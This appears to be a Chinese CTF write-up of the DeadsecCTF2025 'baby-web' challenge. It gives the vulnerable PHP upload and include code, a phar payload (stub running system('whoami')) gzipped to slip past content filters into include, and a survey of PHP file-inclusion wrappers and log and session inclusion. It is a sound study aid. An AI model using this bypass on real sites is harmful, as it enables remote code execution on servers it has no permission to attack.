news 2026/4/18 3:35:45

include文件包含及c底层调试

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
include文件包含及c底层调试

做题笔记:

DeadsecCTF2025 baby-web

ubuntu虚拟环境下安装中间件和php,这里我用的nginx和php8.3

在nginx的html目录下放两个php文件

update.php:

<?php session_start(); error_reporting(0); ​ $allowed_extensions = ['zip', 'bz2', 'gz', 'xz', '7z']; $allowed_mime_types = [ 'application/zip', 'application/x-bzip2', 'application/gzip', 'application/x-gzip', 'application/x-xz', 'application/x-7z-compressed', ]; ​ ​ function filter($tempfile) { $data = file_get_contents($tempfile); if ( stripos($data, "__HALT_COMPILER();") !== false || stripos($data, "PK") !== false || stripos($data, "<?") !== false || stripos(strtolower($data), "<?php") !== false ) { return true; } return false; } ​ if (!isset($_SESSION['dir'])) { $_SESSION['dir'] = random_bytes(4); } ​ $SANDBOX = getcwd() . "/uploads/" . md5("supersafesalt!!!!@#$" . $_SESSION['dir']); if (!file_exists($SANDBOX)) { mkdir($SANDBOX); } ​ if ($_SERVER["REQUEST_METHOD"] == 'POST') { if (is_uploaded_file($_FILES['file']['tmp_name'])) { if (filter($_FILES['file']['tmp_name']) || !isset($_FILES['file']['name'])) { die("Nope :<"); } ​ // mimetype check $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime_type = finfo_file($finfo, $_FILES['file']['tmp_name']); finfo_close($finfo); ​ if (!in_array($mime_type, $allowed_mime_types)) { die('Nope :<'); } ​ // ext check $ext = strtolower(pathinfo(basename($_FILES['file']['name']), PATHINFO_EXTENSION)); ​ if (!in_array($ext, $allowed_extensions)) { die('Nope :<'); } ​ if (move_uploaded_file($_FILES['file']['tmp_name'], "$SANDBOX/" . basename($_FILES['file']['name']))) { echo "File upload success!"; } } } ?> ​ <form enctype='multipart/form-data' action='upload.php' method='post'> <input type='file' name='file'> <input type="submit" value="upload"></p> </form>

index.php:

<?php session_start(); error_reporting(0); ​ if (!isset($_SESSION['dir'])) { $_SESSION['dir'] = random_bytes(4); } ​ if (!isset($_GET['url'])) { die("Nope :<"); } ​ $include_url = basename($_GET['url']); $SANDBOX = getcwd() . "/uploads/" . md5("supersafesalt!!!!@#$" . $_SESSION['dir']); ​ if (!file_exists($SANDBOX)) { mkdir($SANDBOX); } ​ if (!file_exists($SANDBOX . '/' . $include_url)) { die("Nope :<"); } ​ if (!preg_match("/\.(zip|bz2|gz|xz|7z)/i", $include_url)) { die("Nope :<"); } ​ @include($SANDBOX . '/' . $include_url); ?> 我们在这里的主要的限制是在update文件的白名单以及文件内容的过滤: //文件类型的白名单 $allowed_extensions = ['zip', 'bz2', 'gz', 'xz', '7z']; $allowed_mime_types = [ 'application/zip', 'application/x-bzip2', 'application/gzip', 'application/x-gzip', 'application/x-xz', 'application/x-7z-compressed', ]; //文件内容的过滤 if ( stripos($data, "__HALT_COMPILER();") !== false || stripos($data, "PK") !== false || stripos($data, "<?") !== false || stripos(strtolower($data), "<?php") !== false ) { return true;

此处杜绝了伪协议的使用

@include($SANDBOX . '/' . $include_url);

那么这题只有深入底层才能解出可能,当我们include一个文件的时候,会调用一个叫做 compile_filename 的方法:

zend_op_array compile_filename(int type, zend_string filename) { zend_file_handle file_handle; zend_op_array retval; zend_string opened_path = NULL; zend_stream_init_filename_ex(&file_handle, filename); retval = zend_compile_file(&file_handle, type); if (retval && file_handle.handle.stream.handle) { if (!file_handle.opened_path) { file_handle.opened_path = opened_path = zend_string_copy(filename); } zend_hash_add_empty_element(&EG(included_files), file_handle.opened_path); if (opened_path) { zend_string_release_ex(opened_path, 0); } } zend_destroy_file_handle(&file_handle); return retval; }

继续定位到phar对应的编译方法,需要看到 phar_compile_file :

可以看到当他判断到 strstr(ZSTR_VAL(file_handle filename), ".phar") ,也就是发现文件名 中 包 含 字 符 串 .phar , 会 调 用 phar_open_from_filename , 继 续 跟 phar_open_from_filename :

可以看到这里调用了一个叫 phar_open_from_fp 的东西,继续跟一下:

直接让ai解释一下: phar_open_from_fp() 是用于从一个 php_stream (即打开的文件流)中 解析并打开一个 Phar 文件(PHP Archive)的函数:

打开 phar 文件流 ↓ 尝试 rewind 到起始位置 ↓ 是否 gzip?→ 解压 → rewind 是否 bzip2?→ 解压 → rewind 是否 zip?→ phar_parse_zipfile 是否 tar?→ phar_parse_tarfile ↓ 扫描 HALT_COMPILER(); ↓ 找到了 → phar_parse_pharfile() 找不到 → 报错并退出

由此可得,我们解题整体思路应该是:

生成了一个phar文件,然后把他打包成gz文件,当include这个gz文件时,php会默认把这个gz文件解压回phar进行解析,比如我们用下面这个代码生成一个phar文件。

<?php $phar = new Phar('exploit.phar'); $phar -> startBuffering(); $stub = <<<'STUB' <?php system('whoami'); __HALT_COMPILER(); ?> STUB; $phar->setStub($stub); $phar->addFromString('test.txt', 'test'); $phar->stopBuffering(); ?>

在打包一下,可以看到关键字已经完全消失了:

关键字已经完全消失了,而且我们此时的后缀也已经是gz了,属于白名单中。

验证:

root@zou-VMware-Virtual-Platform:/usr/local/nginx/html# /root/php-src-php-8.3.23/sapi/cli/php -S 0.0.0.0:8899

结果显示root,说明我们的文件成功上传并进行了文件包含。

c底层的调试在vscode和pwndbg上进行:


文件包含漏洞(File Inclusion Vulnerability)

通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。

文件包含漏洞环境要求

  • allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据

  • allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件

常见文件包含函数

php中常见的文件包含函数有以下四种:

  • include()

  • require()

  • include_once()

  • require()_once()

include与require基本是相同的,除了错误处理方面:

  • include(),只生成警告(E_WARNING),并且脚本会继续

  • require(),会生成致命错误(E_COMPILE_ERROR)并停止脚本

  • include_once()与require()_once(),如果文件已包含,则不会包含,其他特性如上

php伪协议总结

一.【file://协议】

PHP.ini:

file:// 协议在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响

用法:file:// [文件的绝对路径和文件名]

示例:

file.php:

<?php include($_GET['file']); ?>

1.txt:

<?php phpinfo();

二.【php://协议】

条件:

不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。

php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

参考自:http://php.net/manual/zh/wrappers.php.php#refsect2-wrappers.php-unknown-unknown-unknown-descriptioq

php://filter

读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

PHP.ini:

php://filter在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

示例:

“include 会执行 PHP 代码” 的前提是:它读到的内容必须是“看起来像 PHP 代码”的字节流。
一旦你用 php://filter/read=convert.base64-encode 把真正的 PHP 代码提前变成了“一串看不懂的 Base64 文字”,include 就只能老老实实把这串文字吐到页面上,根本不会去执行。

php://input

可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。

PHP.ini:

allow_url_fopen :off/on

allow_url_include:on

三.【zip://, bzip2://, zlib://协议】

四.【DATA://与PHAR://】

包含APACHE日志文件

包含SESSION

包含/PROC/SELF/ENVIRON

包含临时文件

包含上传文件

总结:

1.底层调试环境pwndbg调试php8.2成功,vscode调试php8.1-dev后门成功。

2.利用phar及压缩文件绕过文件内容过滤和白名单实现成功。

3.利用docker容器环境还原后门,利用后门执行代码成功。

4.底层调试的环境和过程还需要进一步熟悉。

5.文件包含内容:日志文件包含成功,session文件包含成功。

6.临时文件包含pythone脚本需要进一步理解与运用。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/18 3:31:16

2026首发版,自学AI大模型的正确顺序:最新最全学习路线

本文提供大模型学习的七个阶段完整路线图&#xff1a;从数学编程基础、机器学习、深度学习到自然语言处理、大规模语言模型(如Transformer、BERT、GPT)及其应用&#xff0c;最后为持续学习进阶。每个阶段都配有推荐书籍、课程和论文资源&#xff0c;并提供学习资料包帮助零基础…

作者头像 李华
网站建设 2026/4/18 3:35:02

【计算机毕设推荐】:Hadoop+Django气象地质灾害大数据可视化系统 毕业设计 选题推荐 毕设选题 数据分析 机器学习

✍✍计算机毕设指导师** ⭐⭐个人介绍&#xff1a;自己非常喜欢研究技术问题&#xff01;专业做Java、Python、小程序、安卓、大数据、爬虫、Golang、大屏等实战项目。 ⛽⛽实战项目&#xff1a;有源码或者技术上的问题欢迎在评论区一起讨论交流&#xff01; ⚡⚡有什么问题可以…

作者头像 李华
网站建设 2026/4/18 0:26:51

YOLOv11性能暴涨方案:Mamba-MLLA注意力机制实战集成,精度与速度双提升

购买即可解锁300+YOLO优化文章,并且还有海量深度学习复现项目,价格仅需两杯奶茶的钱,别人有的本专栏也有! 文章目录 YOLOv11注意力机制革命:Mamba-MLLA注意力机制完全集成指南 技术突破与性能验证 Mamba-MLLA核心技术解析 状态空间模型与注意力机制融合 YOLOv11与MLLA深度…

作者头像 李华
网站建设 2026/4/11 1:27:08

图神经网络分享系列-GraphSage(Inductive Representation Learning on Large Graphs) (四)

目录 A . 小批量伪代码 核心思想 采样与聚合阶段 邻域采样函数 采样方向与层数定义 B. 附加数据集详情 C. 实验设置与超参数调优细节 D. 深度游走及相关方法的对齐问题与正交不变性 问题一&#xff1a;跨图嵌入空间未对齐 问题二&#xff1a;动态图的嵌入漂移 缓解策…

作者头像 李华
网站建设 2026/4/18 2:53:07

工业AMR场景融合设计原理2——系统的上下文分析

在工业AMR&#xff08;自动移动机器人&#xff09;系统的交付现场&#xff0c;一个反复上演的争议场景极具代表性&#xff1a;业务系统&#xff08;WMS&#xff09;显示“物料已出库&#xff0c;任务完成”&#xff0c;调度系统却报告“车辆仍在工位&#xff0c;任务执行中”&a…

作者头像 李华
网站建设 2026/4/10 10:46:08

YOLO26涨点改进 | 全网独家复现,Neck特征融合创新改进篇 | CVPR 2025 | 引入FEFM和二次创新CFEM交叉融合增强模块,适合小目标检测、红外小目标,助力YOLO26有效涨点

一、本文介绍 本文介绍使用 FEFM模块改进YOLO26 目标检测框架,可有效提升模型在复杂场景下的检测精度。FEFM 通过强化跨模态(如 RGB 与 NIR)间的共性特征并补充差异性高频纹理信息,使得特征表达更加丰富和鲁棒,尤其在低光、遮挡或噪声环境中表现更优。相比传统特征融合方…

作者头像 李华